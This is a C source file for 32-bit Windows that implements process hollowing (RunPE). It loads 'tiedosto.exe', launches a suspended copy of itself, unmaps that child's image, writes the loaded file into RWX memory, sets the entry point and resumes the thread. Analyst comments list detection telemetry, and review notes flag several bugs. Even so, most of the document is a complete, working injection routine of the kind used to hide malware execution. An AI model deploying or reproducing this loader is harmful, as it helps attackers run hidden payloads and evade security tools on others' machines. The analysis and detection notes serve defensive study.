/*
 * Analyst notes on this listing.
 *
 * The program reads "tiedosto.exe" into memory, starts a second copy of its
 * own executable in a suspended state, and replaces that child's image with
 * the file it read. This pattern is commonly called process hollowing / RunPE
 * (MITRE ATT&CK T1055.012).
 *
 * Telemetry the visible call sequence produces, useful for detection:
 *   - a process creating a child from its own image path with CREATE_SUSPENDED;
 *   - GetThreadContext / ReadProcessMemory against that child;
 *   - NtUnmapViewOfSection on the child's image base;
 *   - VirtualAllocEx with PAGE_EXECUTE_READWRITE in the child;
 *   - repeated WriteProcessMemory, then SetThreadContext and ResumeThread.
 * Afterwards the child's mapped image no longer matches its file on disk, and
 * the region at the image base is private RWX memory rather than a mapped image.
 *
 * The code is 32-bit x86 only: it casts pointers to DWORD and uses the
 * Ebx/Eax members of CONTEXT.
 */
#include <windows.h>
#include <stdio.h>

/* Signature used to call ntdll's NtUnmapViewOfSection, resolved at run time. */
typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);

/*
 * Read a whole file into a freshly committed read/write buffer.
 *
 * szFileName: path of the file to read.
 * Returns the buffer, or NULL when the size is 0 or the allocation fails.
 * The caller owns the buffer (ExecFile releases it with VirtualFree).
 * The file size is not returned, so callers cannot bounds-check the contents.
 *
 * NOTE(review): CreateFileA reports failure as INVALID_HANDLE_VALUE, not NULL,
 * so the `if (hFile)` test does not detect a failed open.
 * NOTE(review): the ReadFile result and dwRead are never checked, so a short
 * or failed read still returns a non-NULL buffer.
 */
LPVOID FileToMem(LPCSTR szFileName)
{
    HANDLE hFile;
    DWORD dwRead;
    DWORD dwSize;
    LPVOID pBuffer = NULL;

    hFile = CreateFileA(szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (hFile)
    {
        /* High-order size word is discarded (second argument NULL). */
        dwSize = GetFileSize(hFile, NULL);
        if (dwSize > 0)
        {
            pBuffer = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
            if (pBuffer)
            {
                SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
                ReadFile(hFile, pBuffer, dwSize, &dwRead, NULL);
            }
        }
        CloseHandle(hFile);
    }
    return pBuffer;
}

/*
 * Start szFilePath suspended and overwrite its image with the PE file held
 * in pFile, then resume it.
 *
 * szFilePath: executable to launch as the host process; main() passes this
 *             program's own path, so the child shows up as a copy of the parent.
 * pFile:      in-memory copy of a PE file; released with VirtualFree before
 *             returning, on every path.
 *
 * Nothing is reported to the caller. Apart from the two signature checks and
 * the CreateProcessA / GetThreadContext / VirtualAllocEx results, return
 * values are ignored.
 *
 * NOTE(review): every header field read from pFile (e_lfanew, NumberOfSections,
 * SizeOfHeaders, PointerToRawData, SizeOfRawData) is used without validation,
 * and the function is not given the buffer size, so a malformed file makes
 * this process read outside the buffer.
 * NOTE(review): PI.hProcess, PI.hThread and the CTX allocation are never
 * released.
 */
void ExecFile(LPSTR szFilePath, LPVOID pFile)
{
    PIMAGE_DOS_HEADER IDH;
    PIMAGE_NT_HEADERS INH;
    PIMAGE_SECTION_HEADER ISH;
    PROCESS_INFORMATION PI;
    STARTUPINFOA SI;
    PCONTEXT CTX;
    PDWORD dwImageBase;
    NtUnmapViewOfSection xNtUnmapViewOfSection;
    LPVOID pImageBase;
    int Count;

    /* Only the "MZ" and "PE\0\0" signatures are checked before the headers are trusted. */
    IDH = (PIMAGE_DOS_HEADER)pFile;
    if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
    {
        INH = (PIMAGE_NT_HEADERS)((DWORD)pFile + IDH->e_lfanew);
        if (INH->Signature == IMAGE_NT_SIGNATURE)
        {
            char buf[MAX_PATH*2+1];
            RtlZeroMemory(&SI, sizeof(SI));
            RtlZeroMemory(&PI, sizeof(PI));
            /*
             * NOTE(review): unbounded sprintf. main() supplies a path buffer of
             * 1024 elements while buf holds MAX_PATH*2+1 bytes, so a long path
             * overflows buf.
             * The fixed " -arg1 -arg2" suffix ends up in the child's command line.
             */
            sprintf(buf, "%s -arg1 -arg2", szFilePath);
            /* CREATE_SUSPENDED: the child's primary thread does not run until ResumeThread below. */
            if (CreateProcessA(NULL, buf, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
            {
                /*
                 * NOTE(review): sizeof(CTX) is the size of the pointer, not of
                 * CONTEXT, and the allocation result is dereferenced unchecked.
                 */
                CTX = (PCONTEXT)VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE);
                CTX->ContextFlags = CONTEXT_FULL;
                if (GetThreadContext(PI.hThread, (LPCONTEXT)CTX))
                {
                    /*
                     * Reads 4 bytes from the child at Ebx + 8; presumably the
                     * image-base field of the child's PEB under the x86
                     * start-up convention - confirm.
                     */
                    ReadProcessMemory(PI.hProcess, (LPCVOID)(CTX->Ebx + 8), (LPVOID)&dwImageBase, 4, NULL);
                    /* The original image is unmapped only when it sits at the new image's preferred base. */
                    if ((DWORD)dwImageBase == INH->OptionalHeader.ImageBase)
                    {
                        /* NOTE(review): the GetProcAddress result is called without a NULL check. */
                        xNtUnmapViewOfSection = (NtUnmapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
                        xNtUnmapViewOfSection(PI.hProcess, (PVOID)dwImageBase);
                    }
                    /*
                     * 0x3000 is MEM_COMMIT | MEM_RESERVE. The whole region is
                     * requested as PAGE_EXECUTE_READWRITE at the preferred image
                     * base; no relocation handling is visible, so the call must
                     * succeed at exactly that address for the later writes to happen.
                     */
                    pImageBase = VirtualAllocEx(PI.hProcess, (LPVOID)INH->OptionalHeader.ImageBase, INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
                    if (pImageBase)
                    {
                        /* Copy the PE headers, then each section's raw data to its virtual address. */
                        WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
                        for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
                        {
                            /*
                             * 248 and 40 are the sizes of IMAGE_NT_HEADERS32 and
                             * IMAGE_SECTION_HEADER, hard-coded instead of taken
                             * from the headers or sizeof.
                             */
                            ISH = (PIMAGE_SECTION_HEADER)((DWORD)pFile + IDH->e_lfanew + 248 + (Count * 40));
                            WriteProcessMemory(PI.hProcess, (LPVOID)((DWORD)pImageBase + ISH->VirtualAddress), (LPVOID)((DWORD)pFile + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
                        }
                        /* Writes the new image base back to the location read above (Ebx + 8). */
                        WriteProcessMemory(PI.hProcess, (LPVOID)(CTX->Ebx + 8), (LPVOID)&INH->OptionalHeader.ImageBase, 4, NULL);
                        /* Eax is set to the new image's entry point before the context is applied. */
                        CTX->Eax = (DWORD)pImageBase + INH->OptionalHeader.AddressOfEntryPoint;
                        SetThreadContext(PI.hThread, (LPCONTEXT)CTX);
                        ResumeThread(PI.hThread);
                    }
                }
            }
        }
    }
    /* The input buffer is released whether or not the steps above ran. */
    VirtualFree(pFile, 0, MEM_RELEASE);
}

/*
 * Entry point: loads "tiedosto.exe" from the current directory (relative
 * path), obtains this executable's own path and passes both to ExecFile.
 * The parent then blocks forever in Sleep(INFINITE), so it stays in the
 * process list next to the child it created.
 */
int main()
{
    LPVOID pFile;
    TCHAR szFilePath[1024];

    pFile = FileToMem("tiedosto.exe");
    if (pFile)
    {
        /* The ANSI API is called on a TCHAR buffer through a cast; the return value is not checked. */
        GetModuleFileNameA(0, (LPSTR)szFilePath, 1024);
        ExecFile((LPSTR)szFilePath, pFile);
    }
    Sleep(INFINITE);
    return 0;
}